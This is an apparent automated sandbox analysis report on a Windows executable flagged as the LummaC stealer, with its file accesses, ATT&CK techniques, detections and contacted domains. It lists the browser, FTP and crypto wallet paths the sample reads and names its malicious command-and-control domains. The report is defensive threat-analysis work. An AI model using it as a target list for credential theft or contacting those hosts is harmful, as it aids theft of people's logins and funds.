              Source: C:\Users\user\Desktop\661fW9gxDp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\key4.dbJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
              Tries to harvest and steal ftp login credentials
              Source: C:\Users\user\Desktop\661fW9gxDp.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
              Tries to steal Crypto Currency Wallets
              Source: C:\Users\user\Desktop\661fW9gxDp.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeDirectory queried: C:\Users\user\Documents\AFWAAFRXKOJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeDirectory queried: C:\Users\user\Documents\AFWAAFRXKOJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeDirectory queried: C:\Users\user\Documents\AIXACVYBSBJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeDirectory queried: C:\Users\user\Documents\AIXACVYBSBJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeDirectory queried: C:\Users\user\Documents\CURQNKVOIXJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeDirectory queried: C:\Users\user\Documents\CURQNKVOIXJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeDirectory queried: C:\Users\user\Documents\KZWFNRXYKIJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeDirectory queried: C:\Users\user\Documents\KZWFNRXYKIJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeDirectory queried: C:\Users\user\Documents\MNULNCRIYCJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeDirectory queried: C:\Users\user\Documents\MNULNCRIYCJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeDirectory queried: C:\Users\user\Documents\NIKHQAIQAUJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeDirectory queried: C:\Users\user\Documents\NIKHQAIQAUJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeDirectory queried: C:\Users\user\Documents\AFWAAFRXKOJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeDirectory queried: C:\Users\user\Documents\AFWAAFRXKOJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeDirectory queried: C:\Users\user\Documents\AIXACVYBSBJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeDirectory queried: C:\Users\user\Documents\AIXACVYBSBJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeDirectory queried: C:\Users\user\Documents\KATAXZVCPSJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeDirectory queried: C:\Users\user\Documents\KATAXZVCPSJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeDirectory queried: C:\Users\user\Documents\KATAXZVCPSJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeDirectory queried: C:\Users\user\Documents\KATAXZVCPSJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeDirectory queried: C:\Users\user\Documents\AFWAAFRXKOJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeDirectory queried: C:\Users\user\Documents\AFWAAFRXKOJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeDirectory queried: C:\Users\user\Documents\CURQNKVOIXJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeDirectory queried: C:\Users\user\Documents\CURQNKVOIXJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeDirectory queried: number of queries: 1001
              Source: Yara matchFile source: Process Memory Space: 661fW9gxDp.exe PID: 7684, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Yara detected LummaC Stealer
              Source: Yara matchFile source: Process Memory Space: 661fW9gxDp.exe PID: 7684, type: MEMORYSTR
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
              Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
              Windows Management Instrumentation              		1
              DLL Side-Loading              		1
              Process Injection              		34
              Virtualization/Sandbox Evasion              		2
              OS Credential Dumping              		751
              Security Software Discovery              		Remote Services1
              Archive Collected Data              		11
              Encrypted Channel              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts1
              PowerShell              		Boot or Logon Initialization Scripts1
              DLL Side-Loading              		1
              Process Injection              		LSASS Memory34
              Virtualization/Sandbox Evasion              		Remote Desktop Protocol31
              Data from Local System              		2
              Non-Application Layer Protocol              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
              Deobfuscate/Decode Files or Information              		Security Account Manager2
              Process Discovery              		SMB/Windows Admin SharesData from Network Shared Drive113
              Application Layer Protocol              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook2
              Obfuscated Files or Information              		NTDS2
              File and Directory Discovery              		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
              Software Packing              		LSA Secrets223
              System Information Discovery              		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              DLL Side-Loading              		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              661fW9gxDp.exe51%VirustotalBrowse
              661fW9gxDp.exe66%ReversingLabsWin32.Trojan.StealC
              661fW9gxDp.exe100%AviraTR/Crypt.XPACK.Gen
              661fW9gxDp.exe100%Joe Sandbox ML

              Dropped Files

              No Antivirus matches

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              https://grannyejh.lat/k100%Avira URL Cloudmalware
              https://grannyejh.lat/L100%Avira URL Cloudmalware
              https://grannyejh.lat:443/apiy100%Avira URL Cloudmalware
              https://grannyejh.lat/6100%Avira URL Cloudmalware
              http://crl.microHM0%Avira URL Cloudsafe

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              grannyejh.lat
              		104.21.64.80
              		truefalse
                		high
                s-part-0035.t-0009.t-msedge.net
                		13.107.246.63
                		truefalse
                  		high
                  sweepyribs.lat
                  		unknown
                  		unknownfalse
                    		high

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    necklacebudi.latfalse
                      		high
                      aspecteirs.latfalse
                        		high
                        energyaffai.latfalse
                          		high
                          https://grannyejh.lat/apifalse
                            		high
                            sweepyribs.latfalse
                              		high
                              sustainskelet.latfalse
                                		high
                                crosshuaht.latfalse
                                  		high
                                  rapeflowwj.latfalse
                                    		high
                                    grannyejh.latfalse
                                      		high
                                      discokeyus.latfalse
                                        		high

                                        URLs from Memory and Binaries

                                        NameSourceMaliciousAntivirus DetectionReputation
                                        https://duckduckgo.com/chrome_newtab661fW9gxDp.exe, 00000000.00000003.1424189183.00000000058BB000.00000004.00000800.00020000.00000000.sdmp, 661fW9gxDp.exe, 00000000.00000003.1424105365.00000000058BB000.00000004.00000800.00020000.00000000.sdmp, 661fW9gxDp.exe, 00000000.00000003.1424020620.00000000058BE000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          https://duckduckgo.com/ac/?q=661fW9gxDp.exe, 00000000.00000003.1424189183.00000000058BB000.00000004.00000800.00020000.00000000.sdmp, 661fW9gxDp.exe, 00000000.00000003.1424105365.00000000058BB000.00000004.00000800.00020000.00000000.sdmp, 661fW9gxDp.exe, 00000000.00000003.1424020620.00000000058BE000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://www.google.com/images/branding/product/ico/googleg_lodp.ico661fW9gxDp.exe, 00000000.00000003.1424189183.00000000058BB000.00000004.00000800.00020000.00000000.sdmp, 661fW9gxDp.exe, 00000000.00000003.1424105365.00000000058BB000.00000004.00000800.00020000.00000000.sdmp, 661fW9gxDp.exe, 00000000.00000003.1424020620.00000000058BE000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://grannyejh.lat/6661fW9gxDp.exe, 00000000.00000003.1537994479.0000000000CE6000.00000004.00000020.00020000.00000000.sdmp, 661fW9gxDp.exe, 00000000.00000003.1571502939.0000000000CE6000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: malware
                                              		unknown
                                              https://grannyejh.lat/661fW9gxDp.exe, 661fW9gxDp.exe, 00000000.00000003.1537994479.0000000000CE6000.00000004.00000020.00020000.00000000.sdmp, 661fW9gxDp.exe, 00000000.00000003.1571502939.0000000000CE6000.00000004.00000020.00020000.00000000.sdmp, 661fW9gxDp.exe, 00000000.00000002.1577599879.0000000000CE8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		high
                                                https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=661fW9gxDp.exe, 00000000.00000003.1424189183.00000000058BB000.00000004.00000800.00020000.00000000.sdmp, 661fW9gxDp.exe, 00000000.00000003.1424105365.00000000058BB000.00000004.00000800.00020000.00000000.sdmp, 661fW9gxDp.exe, 00000000.00000003.1424020620.00000000058BE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://grannyejh.lat/L661fW9gxDp.exe, 00000000.00000002.1577599879.0000000000CE8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: malware
                                                  		unknown
                                                  http://crl.rootca1.amazontrust.com/rootca1.crl0661fW9gxDp.exe, 00000000.00000003.1469292388.0000000005894000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=661fW9gxDp.exe, 00000000.00000003.1424189183.00000000058BB000.00000004.00000800.00020000.00000000.sdmp, 661fW9gxDp.exe, 00000000.00000003.1424105365.00000000058BB000.00000004.00000800.00020000.00000000.sdmp, 661fW9gxDp.exe, 00000000.00000003.1424020620.00000000058BE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://ocsp.rootca1.amazontrust.com0:661fW9gxDp.exe, 00000000.00000003.1469292388.0000000005894000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_e149f5d53c9263616797a13067f7a114fa287709b159d0a5661fW9gxDp.exe, 00000000.00000003.1470454881.000000000590F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://www.ecosia.org/newtab/661fW9gxDp.exe, 00000000.00000003.1424189183.00000000058BB000.00000004.00000800.00020000.00000000.sdmp, 661fW9gxDp.exe, 00000000.00000003.1424105365.00000000058BB000.00000004.00000800.00020000.00000000.sdmp, 661fW9gxDp.exe, 00000000.00000003.1424020620.00000000058BE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br661fW9gxDp.exe, 00000000.00000003.1470101487.0000000005B9F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696495411400900000.2&ci=1696495411208.661fW9gxDp.exe, 00000000.00000003.1470454881.000000000590F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://ac.ecosia.org/autocomplete?q=661fW9gxDp.exe, 00000000.00000003.1424189183.00000000058BB000.00000004.00000800.00020000.00000000.sdmp, 661fW9gxDp.exe, 00000000.00000003.1424105365.00000000058BB000.00000004.00000800.00020000.00000000.sdmp, 661fW9gxDp.exe, 00000000.00000003.1424020620.00000000058BE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://grannyejh.lat/apit661fW9gxDp.exe, 00000000.00000003.1575977746.0000000000C7F000.00000004.00000020.00020000.00000000.sdmp, 661fW9gxDp.exe, 00000000.00000002.1577296879.0000000000C7F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://grannyejh.lat:443/api661fW9gxDp.exe, 661fW9gxDp.exe, 00000000.00000003.1575977746.0000000000C54000.00000004.00000020.00020000.00000000.sdmp, 661fW9gxDp.exe, 00000000.00000002.1577296879.0000000000C54000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg661fW9gxDp.exe, 00000000.00000003.1470454881.000000000590F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        http://x1.c.lencr.org/0661fW9gxDp.exe, 00000000.00000003.1469292388.0000000005894000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          http://x1.i.lencr.org/0661fW9gxDp.exe, 00000000.00000003.1469292388.0000000005894000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search661fW9gxDp.exe, 00000000.00000003.1424189183.00000000058BB000.00000004.00000800.00020000.00000000.sdmp, 661fW9gxDp.exe, 00000000.00000003.1424105365.00000000058BB000.00000004.00000800.00020000.00000000.sdmp, 661fW9gxDp.exe, 00000000.00000003.1424020620.00000000058BE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              http://crt.rootca1.amazontrust.com/rootca1.cer0?661fW9gxDp.exe, 00000000.00000003.1469292388.0000000005894000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u661fW9gxDp.exe, 00000000.00000003.1470454881.000000000590F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696495411400900000.1&ci=1696495411208.12791&cta661fW9gxDp.exe, 00000000.00000003.1470454881.000000000590F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://grannyejh.lat/k661fW9gxDp.exe, 00000000.00000003.1575977746.0000000000C7F000.00000004.00000020.00020000.00000000.sdmp, 661fW9gxDp.exe, 00000000.00000002.1577296879.0000000000C7F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: malware
                                                                                    		unknown
                                                                                    https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg661fW9gxDp.exe, 00000000.00000003.1470454881.000000000590F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      http://crl.microHM661fW9gxDp.exe, 00000000.00000003.1575776408.0000000000CC3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      		unknown
                                                                                      https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqd4plX4pbW1CbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi661fW9gxDp.exe, 00000000.00000003.1470454881.000000000590F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://grannyejh.lat:443/apiy661fW9gxDp.exe, 00000000.00000003.1575977746.0000000000C54000.00000004.00000020.00020000.00000000.sdmp, 661fW9gxDp.exe, 00000000.00000002.1577296879.0000000000C54000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: malware
                                                                                        		unknown
                                                                                        https://support.mozilla.org/products/firefoxgro.all661fW9gxDp.exe, 00000000.00000003.1470101487.0000000005B9F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=661fW9gxDp.exe, 00000000.00000003.1424189183.00000000058BB000.00000004.00000800.00020000.00000000.sdmp, 661fW9gxDp.exe, 00000000.00000003.1424105365.00000000058BB000.00000004.00000800.00020000.00000000.sdmp, 661fW9gxDp.exe, 00000000.00000003.1424020620.00000000058BE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            		high

                                                                                            World Map of Contacted IPs

                                                                                            • No. of IPs < 25%
                                                                                            • 25% < No. of IPs < 50%
                                                                                            • 50% < No. of IPs < 75%
                                                                                            • 75% < No. of IPs

                                                                                            Public IPs

                                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                                            104.21.64.80
                                                                                            		grannyejh.latUnited States
                                                                                            		13335CLOUDFLARENETUSfalse

                                                                                            General Information

                                                                                            Joe Sandbox version:41.0.0 Charoite
                                                                                            Analysis ID:1578074
                                                                                            Start date and time:2024-12-19 08:35:37 +01:00
                                                                                            Joe Sandbox product:CloudBasic
                                                                                            Overall analysis duration:0h 4m 32s
                                                                                            Hypervisor based Inspection enabled:false
                                                                                            Report type:full
                                                                                            Cookbook file name:default.jbs
                                                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                            Number of analysed new started processes analysed:5
                                                                                            Number of new started drivers analysed:0
                                                                                            Number of existing processes analysed:0
                                                                                            Number of existing drivers analysed:0
                                                                                            Number of injected processes analysed:0
                                                                                            Technologies:
                                                                                            • HCA enabled
                                                                                            • EGA enabled
                                                                                            • AMSI enabled
                                                                                            Analysis Mode:default
                                                                                            Analysis stop reason:Timeout
                                                                                            Sample name:661fW9gxDp.exe
                                                                                            renamed because original name is a hash value
                                                                                            Original Sample Name:18c608e128d658aef6e267668ddb68e2.exe
                                                                                            Detection:MAL
                                                                                            Classification:mal100.troj.spyw.evad.winEXE@1/0@2/1
                                                                                            EGA Information:Failed
                                                                                            HCA Information:
                                                                                            • Successful, ratio: 100%
                                                                                            • Number of executed functions: 0
                                                                                            • Number of non-executed functions: 1
                                                                                            Cookbook Comments:
                                                                                            • Found application associated with file extension: .exe
                                                                                            • Stop behavior analysis, all processes terminated

                                                                                            Warnings

                                                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, conhost.exe
                                                                                            • Excluded IPs from analysis (whitelisted): 13.107.246.63, 4.245.163.56
                                                                                            • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, azureedge-t-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                                                                                            • Execution Graph export aborted for target 661fW9gxDp.exe, PID 7684 because there are no executed function
                                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                            • Report size getting too big, too many NtQueryDirectoryFile calls found.
                                                                                            • Report size getting too big, too many NtQueryValueKey calls found.
